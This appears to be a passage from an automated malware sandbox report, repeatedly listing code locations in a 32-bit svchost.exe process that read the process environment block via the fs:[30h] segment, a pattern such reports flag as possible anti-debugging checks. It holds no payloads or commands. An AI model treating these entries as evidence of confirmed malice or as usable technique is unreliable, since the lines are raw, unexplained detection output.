                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]1_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]1_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]1_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]1_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]1_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]1_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]1_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]1_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]1_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]1_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]1_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]1_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]1_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]1_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]1_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]1_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]1_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]1_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]1_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]1_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]1_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]1_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
